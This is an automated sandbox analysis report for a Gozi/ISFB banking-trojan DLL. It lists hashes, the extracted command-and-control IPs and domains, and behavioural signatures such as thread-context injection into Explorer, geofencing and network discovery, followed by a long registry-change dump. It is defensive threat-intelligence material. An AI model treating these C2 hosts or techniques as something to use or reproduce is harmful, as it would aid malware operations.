Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
03-08-2022 09:29
Static task
static1
Behavioral task
behavioral1
Sample
62ea3f935563b.dll
Resource
win7-20220715-en
General
-
Target
62ea3f935563b.dll
-
Size
300KB
-
MD5
614e312af0e5de7c6b9819e3a1c766d4
-
SHA1
01e384618d8eadb244184e66e6450752ea0ceade
-
SHA256
982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
-
SHA512
362b32fbc61baf1c757f72d61e582e2741553eda4de022311757a0732a23edabafbcd6affdab97c49d5e1378587b16f1d6730fd9446c801d791056896414d302
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
37.120.206.71
37.120.206.84
193.106.191.163
-
base_path
/drew/
-
build
250240
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi_ifsb
3000
37.120.206.91
37.120.206.95
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
-
base_path
/images/
-
build
250240
-
exe_type
worker
-
extension
.jlk
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process target process PID 2160 set thread context of 1032 2160 powershell.exe Explorer.EXE PID 1032 set thread context of 3452 1032 Explorer.EXE RuntimeBroker.exe PID 1032 set thread context of 3752 1032 Explorer.EXE RuntimeBroker.exe PID 1032 set thread context of 4544 1032 Explorer.EXE RuntimeBroker.exe PID 1032 set thread context of 4916 1032 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
Processes:
net.exenet.exenet.exepid process 5116 net.exe 4476 net.exe 696 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03bd6acb-41d4-47b9- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6bc68a4b-b0ee-4f30- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000064ca497c2ca7d8017048897d2ca7d8017048897d2ca7d801ab4a11000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000336566323963656363663661323665316565653439343865326132313733653635376536383162613165353637646132313765346136323130336331306362320000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000d2ba9200330065006600320039006300650063006300660036006100320036006500310065006500650034003900340038006500320061003200310037003300650036003500370065003600380031006200610031006500350036003700640061003200310037006500340061003600320031003000330063003100300063006200320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33656632396365636366366132366531656565343934386532613231373365363537653638316261316535363764613231376534613632313033633130636232000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ae0548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ae0548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ac56ac6088d2866672963a8250dcfbb3526d3a51b9a3e861858925e66dc0f54" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3ef29ceccf6a26e1eee4948e2a2173e657e681ba1e567da217e4a62103c10cb2" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ee2e1a7d9d3f603ca221d1b8492730e9668343ae08ee9cdca35f68ba826a3e85" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000056540a7b2ca7d80156540a7b2ca7d80156540a7b2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000653435366630633931306366316530336637336363643337346662336231336432353233613534613463313762666663646235323666396234643265333035340000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000aa7c7800650034003500360066003000630039003100300063006600310065003000330066003700330063006300640033003700340066006200330062003100330064003200350032003300610035003400610034006300310037006200660066006300640062003500320036006600390062003400640032006500330030003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65343536663063393130636631653033663733636364333734666233623133643235323361353461346331376266666364623532366639623464326533303534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ada548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ada548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fff28b7a2ca7d801fff28b7a2ca7d801fff28b7a2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000376163353661633630383864323836363637323936336138323530646366626233353236643361353162396133653836313835383932356536366463306635340000b20009000400efbe0355d95b0355d95b2e0000000000000000000000000000000000000000000000000001def600370061006300350036006100630036003000380038006400320038003600360036003700320039003600330061003800320035003000640063006600620062003300350032003600640033006100350031006200390061003300650038003600310038003500380039003200350065003600360064006300300066003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37616335366163363038386432383636363732393633613832353064636662623335323664336135316239613365383631383538393235653636646330663534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad3548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad3548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002e16f07a2ca7d8012e16f07a2ca7d8012e16f07a2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000336566323963656363663661323665316565653439343865326132313733653635376536383162613165353637646132313765346136323130336331306362320000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000d2ba9200330065006600320039006300650063006300660036006100320036006500310065006500650034003900340038006500320061003200310037003300650036003500370065003600380031006200610031006500350036003700640061003200310037006500340061003600320031003000330063003100300063006200320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33656632396365636366366132366531656565343934386532613231373365363537653638316261316535363764613231376534613632313033633130636232000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad6548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad6548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = ff90a47e2ca7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\891988337bcfabadc26731d12a13cf2af72b95139a9f6220c62e6fba3cc17ce3" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e837547b2ca7d801543bc2802ca7d801543bc2802ca7d8016d601a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000653435366630633931306366316530336637336363643337346662336231336432353233613534613463313762666663646235323666396234643265333035340000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000aa7c7800650034003500360066003000630039003100300063006600310065003000330066003700330063006300640033003700340066006200330062003100330064003200350032003300610035003400610034006300310037006200660066006300640062003500320036006600390062003400640032006500330030003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65343536663063393130636631653033663733636364333734666233623133643235323361353461346331376266666364623532366639623464326533303534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ae1548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ae1548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local 